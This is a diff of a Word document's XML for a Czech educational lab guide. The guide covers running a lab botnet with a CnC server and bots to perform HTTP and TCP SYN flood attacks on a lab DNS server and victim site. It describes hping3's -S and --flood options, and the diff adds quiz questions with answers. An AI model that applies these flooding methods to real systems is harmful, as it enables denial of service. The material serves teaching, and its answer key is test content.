-        <w:t xml:space="preserve">“ příkazem, který ovšem potřebuje oprávnění, a navíc pro náš scénář můžeme mít jen pár </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>botů</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, jinak se vypotřebuje výpočetní výkon.</w:t>
+        <w:t xml:space="preserve"> clonevm</w:t>
+      </w:r>
+      <w:r>
+        <w:t>“ příkazem, který ovšem potřebuje oprávnění, a navíc pro náš scénář můžeme mít jen pár botů, jinak se vypotřebuje výpočetní výkon.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4798,21 +4785,8 @@
         </w:rPr>
         <w:t>~</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>4 krát</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, abychom měli celkem 6 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>botů</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+      <w:r>
+        <w:t>4 krát, abychom měli celkem 6 botů.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4876,6 +4850,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3817B872" wp14:editId="29CA0F31">
             <wp:extent cx="4001243" cy="1749287"/>
@@ -4918,7 +4893,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53BF3F83" wp14:editId="6AF45A9B">
             <wp:extent cx="3591426" cy="1038370"/>
@@ -4968,27 +4942,72 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t>Ot</w:t>
+      </w:r>
+      <w:r>
+        <w:t>á</w:t>
+      </w:r>
+      <w:r>
+        <w:t>zka 3.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Jaký DNS server v úpravě komunikace je potřeba, abychom mohli normálně vyhledávat na internetu/stahovat aktualizace</w:t>
+      </w:r>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>8.8.8.8)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
+      <w:bookmarkStart w:id="19" w:name="_Toc192867824"/>
       <w:r>
         <w:t>Krok 3. Útok a jeho dopad</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">Na Kali jsou připraveny dva scripty na měření odezvy: </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t xml:space="preserve">httpcheck_of_delay_external.py </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> a </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> tcpcheck_of_delay_external.py</w:t>
@@ -5019,31 +5038,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Příkazem „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> systemctl status &lt;service&gt;“ (u CnC je </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>startupbind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a startup, v botnetu je listen a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>beacon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) můžeme dále zkontrolovat, jestli vše proběhlo v pořádku.</w:t>
+        <w:t>Příkazem „sudo systemctl status &lt;service&gt;“ (u CnC je startupbind a startup, v botnetu je listen a beacon) můžeme dále zkontrolovat, jestli vše proběhlo v pořádku.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5065,6 +5060,51 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t>Otázka 3.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Jak vypadá celý příkaz pro nastavování .service souboru</w:t>
+      </w:r>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(„sudo systemctl edit &lt;jméno&gt;.service“)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6450FAA0" wp14:editId="3E1F824C">
             <wp:extent cx="2368351" cy="2580515"/>
@@ -5103,22 +5143,12 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Odpozorováno mám, že normální odezva by se měla pohybovat kolem 0.01-0.05s, s prvním útokem se navýší na 0.1-0.15s s druhým na 0.4-0.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>6</w:t>
+      <w:r>
+        <w:t>Odpozorováno mám, že normální odezva by se měla pohybovat kolem 0.01-0.05s, s prvním útokem se navýší na 0.1-0.15s s druhým na 0.4-0.6</w:t>
       </w:r>
       <w:r>
         <w:t>s</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> se třetím okolo jedné sekundy, kde začíná problém s výpočetní sílou počítače</w:t>
       </w:r>
@@ -5144,9 +5174,6 @@
         <w:t>~4 sekund na ~1.5</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -5167,29 +5194,13 @@
         <w:t>smažeme</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> na CnC serveru </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>payloadcheck</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a re</w:t>
+        <w:t xml:space="preserve"> na CnC serveru payloadcheck a re</w:t>
       </w:r>
       <w:r>
         <w:t>startujeme</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> boty. Po jejich zapnutí můžeme payload zase dát zpět a spustíme </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cnc_ping</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> boty. Po jejich zapnutí můžeme payload zase dát zpět a spustíme cnc_ping.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Tím by se </w:t>
@@ -5200,7 +5211,9 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="658D7B1D" wp14:editId="7FB8E99D">
             <wp:extent cx="3153215" cy="619211"/>
@@ -5245,6 +5258,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E5EDF84" wp14:editId="6319BEA4">
             <wp:extent cx="4611269" cy="856583"/>
@@ -5284,58 +5300,44 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:before="0" w:after="160" w:line="278" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="0"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Část </w:t>
-      </w:r>
-      <w:r>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. Scénář </w:t>
-      </w:r>
-      <w:r>
-        <w:t>TCP SYN</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> flood</w:t>
-      </w:r>
+      <w:bookmarkStart w:id="20" w:name="_Toc192867825"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Část 4. Scénář TCP SYN flood</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Krok </w:t>
-      </w:r>
-      <w:r>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Kontrola</w:t>
+      <w:bookmarkStart w:id="21" w:name="_Toc192867826"/>
+      <w:r>
+        <w:t>Krok 1. Kontrola</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> a příprava</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:r>
         <w:t>Jelikož se scénář liší jen v jeho útoku</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> (používáme Hping3 na místo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Scapy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (používáme Hping3 na místo Scapy)</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> a ne </w:t>
@@ -5350,15 +5352,7 @@
         <w:t>, m</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">ůžeme použít podobný postup jak u HTTP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> útoku.</w:t>
+        <w:t>ůžeme použít podobný postup jak u HTTP flood útoku.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5368,6 +5362,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E06B1DD" wp14:editId="3EB42381">
             <wp:extent cx="3977360" cy="852816"/>
@@ -5407,16 +5404,11 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Pokud ano, tak začneme rovnou u CnC serveru, kde stačí změnit obsah </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>payload</w:t>
+        <w:t>Pokud ano, tak začneme rovnou u CnC serveru, kde stačí změnit obsah payload</w:t>
       </w:r>
       <w:r>
         <w:t>check</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> souboru na obsah payload_tcp_test.py</w:t>
       </w:r>
@@ -5432,30 +5424,18 @@
         <w:t xml:space="preserve">nebo </w:t>
       </w:r>
       <w:r>
-        <w:t>můžeme znova použít variantu s </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cnc_ping</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>můžeme znova použít variantu s cnc_ping.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis3"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Krok </w:t>
-      </w:r>
-      <w:r>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. Útok a jeho dopad</w:t>
-      </w:r>
+      <w:bookmarkStart w:id="22" w:name="_Toc192867827"/>
+      <w:r>
+        <w:t>Krok 2. Útok a jeho dopad</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:r>
@@ -5464,6 +5444,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="673A100B" wp14:editId="4AA78B45">
             <wp:extent cx="4908589" cy="2525698"/>
@@ -5503,52 +5486,31 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t xml:space="preserve">Obsah scriptu je podobný, ale vlastně jen určujeme, jak bude vypadat hping3 příkaz. Nedeklarujeme si cílovou IP adresu a port a nastavíme možnosti u příkazu -S, jelikož chceme posílat SYN tcp flag a možnost --flood pro nejrychlejší zasílaní paketů. Po spuštění, útok zapříčiní, že DNS server portu 53 bude přetížen a neměl by být schopen tak vykonávat jeho službu. Tím pádem normální uživatele, kteří na tuto stránku jdou poprvé (nevědí IP adresu stránky </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId49" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+          </w:rPr>
+          <w:t>www.victim.com</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>), nebudou schopni se na stránku dostat.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Spustíme podobný script na ověření odezvy a po nějaké době by měla hodnota překročit požadovanou hodnotu. Tím se přidá na stránku náš řetězec pro splnění úlohy.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Obsah scriptu je podobný, ale vlastně jen určujeme, jak bude vypadat hping3 příkaz. Nedeklarujeme si cílovou IP adresu a port a nastavíme možnosti u </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>příkazu -S</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, jelikož chceme posílat SYN </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> flag a možnost --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>flood</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> pro nejrychlejší zasílaní paketů. Po spuštění, útok zapříčiní, že DNS server portu 53 bude přetížen a neměl by být schopen tak vykonávat jeho službu. Tím pádem normální uživatele, kteří na tuto stránku jdou poprvé (nevědí IP adresu stránky </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId49" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hypertextovodkaz"/>
-          </w:rPr>
-          <w:t>www.victim.com</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>), nebudou schopni se na stránku dostat.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Spustíme podobný script na ověření odezvy a po nějaké době by měla hodnota překročit požadovanou hodnotu. Tím se přidá na stránku náš řetězec pro splnění úlohy.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69AACEB7" wp14:editId="58C91FB1">
             <wp:extent cx="3162741" cy="714475"/>
@@ -5588,6 +5550,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65CE6F86" wp14:editId="3B994471">
             <wp:extent cx="6144482" cy="1076475"/>
@@ -5627,27 +5592,69 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Pro zajímavost ještě můžete vyzkoušet </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcpdump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> nebo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tshark</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> na serverech, pro další vyobrazení útoků.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t xml:space="preserve">Otázka </w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Můžeme stejným způsobem kontrolovat odezvu u obou scénářů</w:t>
+      </w:r>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>ne, protože u jednoho se řeší http požadavky a u druhého tcp spojení)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Pro zajímavost ještě můžete vyzkoušet tcpdump nebo tshark na serverech, pro další vyobrazení útoků.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="547801EE" wp14:editId="194FDB80">
             <wp:extent cx="6395085" cy="512445"/>
@@ -5748,111 +5755,14 @@
       <w:rPr>
         <w:sz w:val="16"/>
       </w:rPr>
-      <w:t xml:space="preserve"> </w:t>
-    </w:r>
-    <w:proofErr w:type="gramStart"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t>2018 - 2020</w:t>
-    </w:r>
-    <w:proofErr w:type="gramEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t xml:space="preserve"> Cisco and/</w:t>
-    </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t>or</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t xml:space="preserve"> </w:t>
-    </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t>its</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t xml:space="preserve"> </w:t>
-    </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t>affiliates</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t xml:space="preserve">. All </w:t>
-    </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t>rights</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t xml:space="preserve"> </w:t>
-    </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t>reserved</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t xml:space="preserve">. Cisco Public </w:t>
+      <w:t xml:space="preserve"> 2018 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public </w:t>
     </w:r>
     <w:r>
       <w:rPr>
         <w:sz w:val="16"/>
       </w:rPr>
       <w:tab/>
-    </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t>Page</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t xml:space="preserve"> </w:t>
+      <w:t xml:space="preserve">Page </w:t>
     </w:r>
     <w:r>
       <w:rPr>
@@ -5887,21 +5797,7 @@
       <w:rPr>
         <w:sz w:val="16"/>
       </w:rPr>
-      <w:t xml:space="preserve"> </w:t>
-    </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t>of</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:sz w:val="16"/>
-      </w:rPr>
-      <w:t xml:space="preserve"> </w:t>
+      <w:t xml:space="preserve"> of </w:t>
     </w:r>
     <w:fldSimple w:instr=" NUMPAGES   \* MERGEFORMAT ">
       <w:r>
@@ -6171,63 +6067,11 @@
         </mc:Fallback>
       </mc:AlternateContent>
     </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:proofErr w:type="gramStart"/>
     <w:r>
       <w:rPr>
         <w:b/>
       </w:rPr>
-      <w:t>Lab</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:b/>
-      </w:rPr>
-      <w:t xml:space="preserve"> - </w:t>
-    </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:b/>
-      </w:rPr>
-      <w:t>Certificate</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:proofErr w:type="gramEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:b/>
-      </w:rPr>
-      <w:t xml:space="preserve"> </w:t>
-    </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:b/>
-      </w:rPr>
-      <w:t>Authority</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:b/>
-      </w:rPr>
-      <w:t xml:space="preserve"> </w:t>
-    </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:b/>
-      </w:rPr>
-      <w:t>Stores</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:b/>
-      </w:rPr>
-      <w:t xml:space="preserve"> </w:t>
+      <w:t xml:space="preserve">Lab - Certificate Authority Stores </w:t>
     </w:r>
   </w:p>
 </w:hdr>
